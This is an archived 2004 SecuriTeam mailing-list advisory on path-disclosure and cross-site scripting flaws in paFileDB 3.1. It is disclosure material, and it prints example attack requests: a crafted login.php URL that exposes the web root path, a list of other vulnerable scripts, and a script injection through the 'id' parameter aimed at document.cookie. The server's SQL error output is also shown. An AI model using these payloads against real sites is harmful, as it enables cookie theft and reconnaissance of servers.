[UNIX] paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/02/04
- Previous message: SecuriTeam: "[UNIX] OpenBB Multiple Vulnerabilities (board.php, search.php, member.php, post.php, myhome.php, index.php)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 May 2004 11:25:25 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)
------------------------------------------------------------------------
SUMMARY
" <http://www.phparena.net/pafiledb.php> paFileDB is designed to allow
webmasters have a database of files for download on their site. To add a
download, all you do is upload the file using FTP or whatever method you
use, log into paFileDB's admin center, and fill out a form to add a file.
paFileDB lets you edit and delete the files too. No more messing with a
bunch of HTML pages for a file database on your site! Using speedy MySQL
for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!"
The script package is prone to cross-site scripting attacks and
information gathering by full path disclosure.
DETAILS
Vulnerable Systems:
* paFileDB version 3.1, possibly prior
Path Disclosure
This vulnerability would allow a remote user to determine the full path to
the web root directory and other potentially sensitive information.
An example HTTP request:
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho&B1=%3E%3E Log In %3C%3C&action=admin&login=do
A standard error message is returned specifying the full pathname of the
web root directory and the script path:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php on line 12
Additional vulnerable scripts (the list is by no means complete):
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
Cross-site Scripting
The XSS condition occurs due to the 'id' parameter not being thoroughly
sanitized:
http://localhost/pafiledb.php?action=category&id='<scr!pt>alert(document.cookie);</scr!pt>
The error message returned by the server is:
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
ADDITIONAL INFORMATION
The information has been provided by <mailto:k1ll3rb0y@hotmail.com>
k1LL3r B0y.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] OpenBB Multiple Vulnerabilities (board.php, search.php, member.php, post.php, myhome.php, index.php)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
